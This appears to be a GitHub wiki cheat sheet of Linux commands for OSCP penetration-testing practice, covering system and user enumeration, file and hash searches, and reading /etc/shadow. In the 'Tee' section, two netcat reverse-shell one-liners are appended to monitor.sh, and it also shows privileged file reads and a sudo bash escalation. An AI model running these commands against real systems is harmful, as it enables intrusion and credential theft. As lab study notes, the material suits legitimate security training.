Linux - A1vinSmith/OSCP-PWK GitHub Wiki

Check Kernel Version

https://phoenixnap.com/kb/check-linux-kernel-version

uname -a
hostnamectl
cat /proc/version
cat /etc/issue
dmesg | grep Linux

Check architecture

lscpu

Check Release

cat /etc/lsb-release
cat /etc/update-manager/meta-release
cat /etc/os-release

Find ip among files

grep -rn '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'

Find flag in MOTD

cd /etc/update-motd.d
grep -irn 'flag'

Find users

cat /etc/passwd | grep /bin/bash

cat /etc/passwd | cut -d : -f 1

Note that grepping for /bin/bash misses accounts whose shell is /bin/sh, zsh, etc.; check the seventh field for anything that is not nologin/false.
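As an added example (not from the wiki), the same /etc/passwd enumeration done in one script, going a step further than the two one-liners above: it lists every account with a usable login shell (not just bash), flags any second UID 0 account, and prints the home directories worth searching. The passwd content below is a constructed sample; on a target pass `"$(cat /etc/passwd)"` instead.

```shell
#!/bin/sh
# Added example, not part of the wiki: enumerate accounts from /etc/passwd-format input.
# SAMPLE_PASSWD is constructed for this demo (name:pw:uid:gid:gecos:home:shell).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
jimmy:x:1000:1000:Jimmy:/home/jimmy:/bin/bash
backup_admin:x:0:0:legacy backup:/var/backups:/bin/sh
svc:x:1001:1001::/opt/svc:/usr/sbin/nologin
dev:x:1002:1002::/home/dev:/bin/zsh'

# Accounts that can actually log in: shell is not nologin, false or sync.
# Broader than "grep /bin/bash", which would miss /bin/sh and /bin/zsh here.
login_users() {
    printf '%s\n' "$1" | awk -F: '$7 !~ /(nologin|false|sync)$/ { print $1 }'
}

# Any UID 0 account besides root is a second root: a backdoor or a priv-esc lead.
extra_uid0() {
    printf '%s\n' "$1" | awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Home directories of ordinary users (UID >= 1000, excluding nobody/65534):
# look there for readable .ssh keys, .bash_history and config files with credentials.
user_homes() {
    printf '%s\n' "$1" | awk -F: '$3 >= 1000 && $3 != 65534 { print $6 }'
}

# Stand-alone run against the constructed sample
echo "login users:";  login_users "$SAMPLE_PASSWD"
echo "extra uid 0:";  extra_uid0 "$SAMPLE_PASSWD"
echo "user homes:";   user_homes "$SAMPLE_PASSWD"
```

The awk filters work on the real file unchanged; the only thing that varies between distributions is the nologin path, which the regex ignores by anchoring on the name only.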

Find files

find / -type f -name '*.conf' -user root -size +25k -size -28k -newermt 2020-03-03 -exec ls -al {} \; 2>/dev/null

The glob must be quoted, otherwise the shell expands *.conf against the current directory before find sees it. -newermt (modified after the given date) is a GNU find option.

find / -user jimmy 2>/dev/null

Find users hash

cat /etc/shadow

find / -name '*shadow*' -exec ls -lt {} \; 2>/dev/null

A stray backup such as /var/shadow.bak may be readable even when /etc/shadow is not.

File Read

These commands read data from files; when one of them runs with elevated privileges (SUID, sudo) it can be used for privileged reads or to disclose files outside a restricted file system.

LFILE=file_to_read
base64 "$LFILE" | base64 --decode
xxd "$LFILE" | xxd -r

List all processes/services

ps -aux
ps aux

ps aux | grep root

Switch to another user

su -l user

Run as another user

sudo -u user2 /bin/bash -p

Sed

https://www.howtogeek.com/666395/how-to-use-the-sed-command-on-linux/

Find

find / -xdev -type f -print0 2>/dev/null | xargs -0 grep -E '^[a-z0-9]{32}$' 2>/dev/null

  • -xdev stays on the file system of / and does not descend into other mounts (skips /proc, /sys, network shares)

  • -type f only looks at regular files

  • -print0 prints each full file name terminated by a NUL byte instead of a newline, so names containing spaces or newlines stay intact

  • 2>/dev/null discards error messages (permission denied, etc.) so they do not clutter the results

  • xargs -0 reads that NUL-delimited input, so spaces, quotes and backslashes inside file names are not treated specially

  • the regex, anchored with ^ and $, matches lines that consist of exactly 32 characters from a-z and 0-9 (the shape of an MD5 hash or a flag)
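As an added example (not from the wiki), the pipeline above run against a constructed directory tree so the point of -print0 / -0 is visible: one file name contains a space, and the plain `find | xargs` variant silently misses the hash in it. The file names and the 32-character value are made up for the demo; `-H` is added to grep so the file name is always printed.

```shell
#!/bin/sh
# Added example, not part of the wiki: find | xargs -0 grep for 32-char [a-z0-9] lines.
# The sample tree and the hash value are constructed for this demo.

# Build a throwaway tree; one directory name contains a space on purpose.
make_sample_tree() {
    _d=$(mktemp -d)
    mkdir -p "$_d/etc" "$_d/home/jimmy/my notes"
    printf 'Port 22\n' > "$_d/etc/ssh_config"
    printf '0123456789abcdef0123456789abcdef\n' > "$_d/home/jimmy/my notes/todo.txt"
    # Same value but not on a line of its own: must NOT match the anchored regex
    printf 'hash=0123456789abcdef0123456789abcdef\n' > "$_d/etc/app.conf"
    printf '%s\n' "$_d"
}

# The wiki's pipeline: regular files only, NUL-delimited names, stderr dropped,
# lines that are exactly 32 characters of [a-z0-9]. -H forces "file:line" output.
find_hashes() {
    find "$1" -xdev -type f -print0 2>/dev/null \
        | xargs -0 grep -HE '^[a-z0-9]{32}$' 2>/dev/null
}

# Same pipeline without -print0/-0: xargs splits "my notes/todo.txt" on the
# space into two paths that do not exist, so the hash is never found.
find_hashes_broken() {
    find "$1" -xdev -type f 2>/dev/null \
        | xargs grep -HE '^[a-z0-9]{32}$' 2>/dev/null
}

# Stand-alone run
SAMPLE_DIR=$(make_sample_tree)
echo "with -print0/-0:";    find_hashes "$SAMPLE_DIR"
echo "without (misses it):"; find_hashes_broken "$SAMPLE_DIR"
rm -rf "$SAMPLE_DIR"
```

On a real box replace the sample root with / (and keep -xdev, or the search wanders into /proc and mounted shares); expect the run to take a while.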

Make a reverse shell

Tr

https://www.computerhope.com/unix/utr.htm

cat file | tr -d ' '

Removes all the spaces within the file.

Cat

Tee

Both lines append the same mkfifo/nc reverse shell one-liner to monitor.sh (adjust the listener IP and port to your own); tee -a and >> are equivalent here, tee being the one to use when the append has to go through sudo.

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.1 4567 >/tmp/f' | tee -a monitor.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f' >> monitor.sh

File Signatures

How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

netstat -tunleep4 | grep -v "127.0.0" | awk '{print $6}' | grep LISTEN | wc -l

awk '{print $6}' selects the State column, so only TCP sockets (state LISTEN) are counted; UDP sockets have no state and are dropped by the grep. grep -v "127.0.0" removes anything bound to loopback.
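As an added example (not from the wiki), the same count done with awk over constructed `netstat -tunlp4`-style output, with a second function that also counts UDP sockets, which the LISTEN filter above drops. The netstat lines below are constructed for the demo; the column layout assumed is the one without -e (Proto, Recv-Q, Send-Q, Local Address, Foreign Address, State, PID/Program).

```shell
#!/bin/sh
# Added example, not part of the wiki: count non-loopback listening sockets
# from netstat-style output. SAMPLE_NETSTAT is constructed for this demo.
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1021/mysqld
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1104/apache2
tcp        0      0 10.10.10.5:8080         0.0.0.0:*               LISTEN      1300/java
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      640/systemd-resolve
udp        0      0 0.0.0.0:68              0.0.0.0:*                           700/dhclient
udp        0      0 127.0.0.53:53           0.0.0.0:*                           640/systemd-resolve'

# Equivalent of the wiki pipeline: TCP sockets in LISTEN state, local address
# not on loopback. Filters on the Local Address column rather than the whole line.
count_tcp_listeners() {
    printf '%s\n' "$1" | awk '
        $1 == "tcp" && $6 == "LISTEN" && $4 !~ /^127\./ { n++ }
        END { print n + 0 }'
}

# Same, but UDP sockets count too: they have no State column, so the wiki
# pipeline never sees them. This is the number of exposed services.
count_all_listeners() {
    printf '%s\n' "$1" | awk '
        $4 !~ /^127\./ && (($1 == "tcp" && $6 == "LISTEN") || $1 == "udp") { n++ }
        END { print n + 0 }'
}

# Print the exposed address:port pairs so the count can be checked by eye.
list_listeners() {
    printf '%s\n' "$1" | awk '
        $4 !~ /^127\./ && (($1 == "tcp" && $6 == "LISTEN") || $1 == "udp") { print $1, $4 }'
}

# Stand-alone run against the constructed sample
echo "tcp only: $(count_tcp_listeners "$SAMPLE_NETSTAT")"
echo "tcp+udp:  $(count_all_listeners "$SAMPLE_NETSTAT")"
list_listeners "$SAMPLE_NETSTAT"
```

On a target feed it `"$(netstat -tunlp4)"`; with -e the State column moves for UDP lines, which is why the functions key on $1 and $4 and only consult $6 for TCP.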

Capture ping

sudo tcpdump -i tun0 icmp

https://www.ibm.com/support/pages/using-tcpdump-verify-icmp-polling

Disk

df -lh
mount